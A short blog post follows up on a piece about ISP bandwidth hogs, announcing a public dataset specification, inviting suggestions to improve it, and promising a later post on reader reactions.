Last week I wrote a twin piece with my fellow blogger Herman Wagter regarding bandwidth hogs.
This piece got quite a bit of attention.
As promised, the dataset specification is now public. I believe that collecting and aggregating the data in this way will make it possible to answer the question, but I am open to suggestions on how to improve the dataset, as long as it stays realistic (both in the scope of the dataset and in the ability of ISPs to produce the data).
For what it's worth, I also intend to publish a light-hearted piece on the impact this has had on my blog readership and on the nature of comments posted to this piece this week-end. Stay tuned!